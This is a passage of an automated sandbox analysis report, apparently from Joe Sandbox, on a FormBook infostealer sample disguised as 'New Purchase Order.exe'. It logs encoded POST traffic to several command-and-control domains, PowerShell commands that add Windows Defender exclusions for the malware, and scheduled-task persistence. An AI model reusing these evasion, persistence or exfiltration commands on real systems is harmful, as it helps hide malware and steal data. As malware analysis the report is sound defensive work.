                        Referer: http://www.fvti.cloud/dw6h/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Ascii: lt=c9Bk/92Xcm2L/1bErYtcQyDOxf5h3w/WOVjFFj+NR+HiBf3zFmSytraNys8SB2Vnvf+6KMetXuFnWx5nu3U28LF/o8WcU36P2UAgRUv3q89ozzle4u1KwN08mRYDwq5vjg7jBUgg3i5mddibO/sx8tAdhlSNeeGoqD60WEoHmHq2EtqZfDM68/Pj0JRLnfQEaQ==
                        Sep 9, 2024 04:53:54.399895906 CEST | 635 | IN | HTTP/1.1 200 OK
                        Server: nginx
                        Date: Mon, 09 Sep 2024 02:53:54 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Content-Encoding: gzip
                        Data: gzip-compressed response body (binary, not printable; hex dump and ASCII rendering omitted)


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        34 | 192.168.2.4 | 49776 | 38.55.112.70 | 80 | 2132 | C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 9, 2024 04:53:56.029195070 CEST | 776 | OUT | POST /dw6h/ HTTP/1.1
                        Host: www.fvti.cloud
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 219
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.fvti.cloud
                        Referer: http://www.fvti.cloud/dw6h/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Sep 9, 2024 04:53:56.940342903 CEST  635  IN  HTTP/1.1 200 OK
                        Server: nginx
                        Date: Mon, 09 Sep 2024 02:53:56 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Content-Encoding: gzip


                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                        35          192.168.2.4  49777        38.55.112.70    80                2132  C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        Timestamp                            Bytes transferred  Direction  Data
                        Sep 9, 2024 04:53:58.580576897 CEST  10858              OUT        POST /dw6h/ HTTP/1.1
                        Host: www.fvti.cloud
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 10299
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.fvti.cloud
                        Referer: http://www.fvti.cloud/dw6h/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Sep 9, 2024 04:53:59.485311031 CEST  635  IN  HTTP/1.1 200 OK
                        Server: nginx
                        Date: Mon, 09 Sep 2024 02:53:59 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Content-Encoding: gzip


                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                        36          192.168.2.4  49778        38.55.112.70    80                2132  C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        Timestamp                            Bytes transferred  Direction  Data
                        Sep 9, 2024 04:54:01.124044895 CEST  491                OUT        GET /dw6h/?lt=R/pE8KC/c36ywADQh5FkOiDH8KVbuy/iFFPQAWrjddfpU+7mPUq4raSb1MURPFl7uYa4SfXFDOIuFXNkiFpjga1JutrdCl+XzV0YaijSh6Fqy01qwtES1vY=&3ry=nj20Xr HTTP/1.1
                        Host: www.fvti.cloud
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-US,en;q=0.5
                        Connection: close
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Sep 9, 2024 04:54:02.019310951 CEST  794  IN  HTTP/1.1 200 OK
                        Server: nginx
                        Date: Mon, 09 Sep 2024 02:54:01 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Data Ascii: 259<!doctype html><html><head> <title>......</title> <meta charset="utf-8"><script>var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?a06b4d1659d3d0d2e58179ddfe478d25"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script></head><body><script> window.onload = function() { setTimeout(function() { window.location.href = 'https://fe3e9h.com:9009/register'; }, 1000); // 1 }; </script></body></html>0


                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                        37          192.168.2.4  49779        162.240.81.18   80                2132  C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        Timestamp                            Bytes transferred  Direction  Data
                        Sep 9, 2024 04:54:15.609855890 CEST  780                OUT        POST /3i7y/ HTTP/1.1
                        Host: www.sorriragora.online
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 199
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.sorriragora.online
                        Referer: http://www.sorriragora.online/3i7y/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Sep 9, 2024 04:54:16.181195021 CEST  1236  IN  HTTP/1.1 404 Not Found
                        Server: nginx/1.20.1
                        Date: Mon, 09 Sep 2024 02:54:16 GMT
                        Content-Type: text/html
                        Content-Length: 3650
                        Connection: close
                        ETag: "663a05b6-e42"
                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                        Sep 9, 2024 04:54:16.181211948 CEST  1236  IN
                        Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color:
                        Sep 9, 2024 04:54:16.181226969 CEST  1236  IN
                        Data Ascii: <h1><strong>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="
                        Sep 9, 2024 04:54:16.181236982 CEST  115  IN
                        Data Ascii: Fedora ]" width="88" height="31" /></a> </div> </div> </body></html>


                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                        38          192.168.2.4  49780        162.240.81.18   80                2132  C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        Timestamp                            Bytes transferred  Direction  Data
                        Sep 9, 2024 04:54:18.152858973 CEST  800                OUT        POST /3i7y/ HTTP/1.1
                        Host: www.sorriragora.online
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 219
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.sorriragora.online
                        Referer: http://www.sorriragora.online/3i7y/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Sep 9, 2024 04:54:18.700571060 CEST  1236  IN  HTTP/1.1 404 Not Found
                        Server: nginx/1.20.1
                        Date: Mon, 09 Sep 2024 02:54:18 GMT
                        Content-Type: text/html
                        Content-Length: 3650
                        Connection: close
                        ETag: "663a05b6-e42"
                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                        Sep 9, 2024 04:54:18.700594902 CEST  224  IN
                        Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center;
                        Sep 9, 2024 04:54:18.700606108 CEST  1236  IN
                        Data Ascii: background-color: #3C6EB4; font-size: 1.1em; font-weight: bold; color: #fff; margin: 0; padding: 0.5em; border-bottom: 2px solid #294172;
                        Sep 9, 2024 04:54:18.700619936 CEST  1127  IN
                        Data Ascii: <div class="content"> <p>Something has triggered missing webpage on your website. This is the default 404 error page for <strong>nginx</strong> that is distributed with


                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                        39          192.168.2.4  49781        162.240.81.18   80                2132  C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        Timestamp                            Bytes transferred  Direction  Data
                        Sep 9, 2024 04:54:20.704771996 CEST  10882              OUT        POST /3i7y/ HTTP/1.1
                        Host: www.sorriragora.online
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 10299
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.sorriragora.online
                        Referer: http://www.sorriragora.online/3i7y/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Sep 9, 2024 04:54:21.251007080 CEST  1236  IN  HTTP/1.1 404 Not Found
                        Server: nginx/1.20.1
                        Date: Mon, 09 Sep 2024 02:54:21 GMT
                        Content-Type: text/html
                        Content-Length: 3650
                        Connection: close
                        ETag: "663a05b6-e42"
                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                        Sep 9, 2024 04:54:21.251023054 CEST  224  IN
                        Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center;
                        Sep 9, 2024 04:54:21.251034975 CEST  1236  IN
                        Data Ascii: background-color: #3C6EB4; font-size: 1.1em; font-weight: bold; color: #fff; margin: 0; padding: 0.5em; border-bottom: 2px solid #294172;
                        Sep 9, 2024 04:54:21.251046896 CEST  224  IN
                        Data Ascii: <div class="content"> <p>Something has triggered missing webpage on your website. This is the default 404 error page for <strong>nginx</strong> that is distr
                        Sep 9, 2024 04:54:21.256911039 CEST  903  IN
                        Data Ascii: ibuted with Fedora. It is located <tt>/usr/share/nginx/html/404.html</tt></p> <p>You should customize this error page for your own site or edit the <tt>error_pag


                        Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                        40          192.168.2.4  49782        162.240.81.18   80                2132  C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        Timestamp                            Bytes transferred  Direction  Data
                        Sep 9, 2024 04:54:23.242863894 CEST  499                OUT        GET /3i7y/?lt=7+2uneOBixDDmhLFRXF/ufkAm5AC1SXFsWvwANuZC0TQ0YERrtM9rlugcy5pD3j7o6sEidpw3wSWmiKn6bu88qr2mjlQFSGqmkD6eyB8L9Z0Lf+o3Q/3u6k=&3ry=nj20Xr HTTP/1.1
                        Host: www.sorriragora.online
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-US,en;q=0.5
                        Connection: close
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Sep 9, 2024 04:54:23.800533056 CEST  1236  IN  HTTP/1.1 404 Not Found
                        Server: nginx/1.20.1
                        Date: Mon, 09 Sep 2024 02:54:23 GMT
                        Content-Type: text/html
                        Content-Length: 3650
                        Connection: close
                        ETag: "663a05b6-e42"
                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
                        Timestamp:Sep 9, 2024 04:54:23.800549984 CEST
                        Bytes transferred:1236
                        Direction:IN
                        Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color:
                        Timestamp:Sep 9, 2024 04:54:23.800561905 CEST
                        Bytes transferred:448
                        Direction:IN
                        Data Ascii: <h1><strong>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="
                        Timestamp:Sep 9, 2024 04:54:23.800574064 CEST
                        Bytes transferred:903
                        Direction:IN
                        Data Ascii: ibuted with Fedora. It is located <tt>/usr/share/nginx/html/404.html</tt></p> <p>You should customize this error page for your own site or edit the <tt>error_pag


                        Session ID:41
                        Source IP:192.168.2.4
                        Source Port:49783
                        Destination IP:54.183.209.210
                        Destination Port:80
                        PID:2132
                        Process:C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        Timestamp:Sep 9, 2024 04:54:28.862247944 CEST
                        Bytes transferred:765
                        Direction:OUT
                        Data:POST /6ua2/ HTTP/1.1
                        Host: www.jyourwd.store
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 199
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.jyourwd.store
                        Referer: http://www.jyourwd.store/6ua2/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Ascii: lt=cMIlNQIAz7wXMcaJa5R84wMdkPBJyoF/phLC13UtKAVv8/Wck2SjvA8qocGGyBJsILlrH8CgdK/VnKICp/wULXLu9hORX6Czpu8mEdoOzZypf0surSO2gvzmI/hKqIxZFPip31uRRhkH4Ru+FIyjXtXaoe+rN9JZEcwaglImBzBbHctNxveVuNOorXeVuRr3bg==


                        Session ID:42
                        Source IP:192.168.2.4
                        Source Port:49784
                        Destination IP:54.183.209.210
                        Destination Port:80
                        PID:2132
                        Process:C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        Timestamp:Sep 9, 2024 04:54:31.405862093 CEST
                        Bytes transferred:785
                        Direction:OUT
                        Data:POST /6ua2/ HTTP/1.1
                        Host: www.jyourwd.store
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 219
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.jyourwd.store
                        Referer: http://www.jyourwd.store/6ua2/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530
                        Data Ascii: lt=cMIlNQIAz7wXN8qJKoR8tgMC9/BJ7IF7ph3C1zM9Jyhv8emcl3SjuA8qj8GD8hJ3ILgYH5qgdK7VnPMCqPMTLHLskxOXIqCzpu8mEeVVzZqpfAQur2S58/zlevhK9YxCFPif3wP+RjsH4Qe+GcegOdXQn+/5c/cNNtFkt0cqOXd2Ga8Xge/C8Nqb2QXhjSW+Agx6ok5DIdVJZ9q8DSx/yU4=


                        Session ID:43
                        Source IP:192.168.2.4
                        Source Port:49785
                        Destination IP:54.183.209.210
                        Destination Port:80
                        PID:2132
                        Process:C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        Timestamp:Sep 9, 2024 04:54:33.948301077 CEST
                        Bytes transferred:10867
                        Direction:OUT
                        Data:POST /6ua2/ HTTP/1.1
                        Host: www.jyourwd.store
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-US,en;q=0.5
                        Content-Length: 10299
                        Connection: close
                        Cache-Control: no-cache
                        Content-Type: application/x-www-form-urlencoded
                        Origin: http://www.jyourwd.store
                        Referer: http://www.jyourwd.store/6ua2/
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530


                        Session ID:44
                        Source IP:192.168.2.4
                        Source Port:49786
                        Destination IP:54.183.209.210
                        Destination Port:80
                        PID:2132
                        Process:C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
                        Timestamp:Sep 9, 2024 04:54:36.489538908 CEST
                        Bytes transferred:494
                        Direction:OUT
                        Data:GET /6ua2/?3ry=nj20Xr&lt=ROgFOn87xawaO6SZL50JuAl1kKxTrphupTX70ShDOCtjrPizjlCh9yM4paCu7ldqJbY3adTxPonHhY9dmNlpIFS90RvvBYO2gPQCKrVy+PqJYkpukQev2c8= HTTP/1.1
                        Host: www.jyourwd.store
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-US,en;q=0.5
                        Connection: close
                        User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.78 Safari/537.36 OPR/30.0.1856.95530



                        Target ID:0
                        Start time:22:50:53
                        Start date:08/09/2024
                        Path:C:\Users\user\Desktop\New Purchase Order.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\New Purchase Order.exe"
                        Imagebase:0x5d0000
                        File size:693'248 bytes
                        MD5 hash:9EF9CFFB40D3911E46CB798DAA08B46F
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:2
                        Start time:22:50:54
                        Start date:08/09/2024
                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Purchase Order.exe"
                        Imagebase:0x7e0000
                        File size:433'152 bytes
                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:3
                        Start time:22:50:54
                        Start date:08/09/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:4
                        Start time:22:50:55
                        Start date:08/09/2024
                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ibDqDkseW.exe"
                        Imagebase:0x7e0000
                        File size:433'152 bytes
                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:5
                        Start time:22:50:55
                        Start date:08/09/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:6
                        Start time:22:50:55
                        Start date:08/09/2024
                        Path:C:\Windows\SysWOW64\schtasks.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ibDqDkseW" /XML "C:\Users\user\AppData\Local\Temp\tmp83A4.tmp"
                        Imagebase:0x2d0000
                        File size:187'904 bytes
                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:7
                        Start time:22:50:55
                        Start date:08/09/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:8
                        Start time:22:50:55
                        Start date:08/09/2024
                        Path:C:\Users\user\Desktop\New Purchase Order.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\New Purchase Order.exe"
                        Imagebase:0x630000
                        File size:693'248 bytes
                        MD5 hash:9EF9CFFB40D3911E46CB798DAA08B46F
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1910412100.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.1910412100.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1912552591.0000000001450000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.1912552591.0000000001450000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.1912779257.0000000003360000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.1912779257.0000000003360000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                        Reputation:low
                        Has exited:true

                        Target ID:9
                        Start time:22:50:57
                        Start date:08/09/2024
                        Path:C:\Users\user\AppData\Roaming\ibDqDkseW.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Roaming\ibDqDkseW.exe
                        Imagebase:0xf30000
                        File size:693'248 bytes
                        MD5 hash:9EF9CFFB40D3911E46CB798DAA08B46F
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 100%, Joe Sandbox ML
                        • Detection: 21%, ReversingLabs
                        Reputation:low
                        Has exited:true

                        Target ID:10
                        Start time:22:50:57
                        Start date:08/09/2024
                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Imagebase:0x7ff693ab0000
                        File size:496'640 bytes
                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                        Has elevated privileges:true
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:11
                        Start time:22:51:00
                        Start date:08/09/2024
                        Path:C:\Windows\SysWOW64\schtasks.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ibDqDkseW" /XML "C:\Users\user\AppData\Local\Temp\tmp9641.tmp"
                        Imagebase:0x2d0000
                        File size:187'904 bytes
                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:12
                        Start time:22:51:00
                        Start date:08/09/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7699e0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        Target ID:13
                        Start time:22:51:00
                        Start date:08/09/2024
                        Path:C:\Users\user\AppData\Roaming\ibDqDkseW.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Users\user\AppData\Roaming\ibDqDkseW.exe"
                        Imagebase:0x1a0000
                        File size:693'248 bytes
                        MD5 hash:9EF9CFFB40D3911E46CB798DAA08B46F
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:14
                        Start time:22:51:00
                        Start date:08/09/2024
                        Path:C:\Users\user\AppData\Roaming\ibDqDkseW.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Roaming\ibDqDkseW.exe"
                        Imagebase:0x9e0000
                        File size:693'248 bytes
                        MD5 hash:9EF9CFFB40D3911E46CB798DAA08B46F
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        Target ID:16
                        Start time:22:51:11
                        Start date:08/09/2024
                        Path:C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe
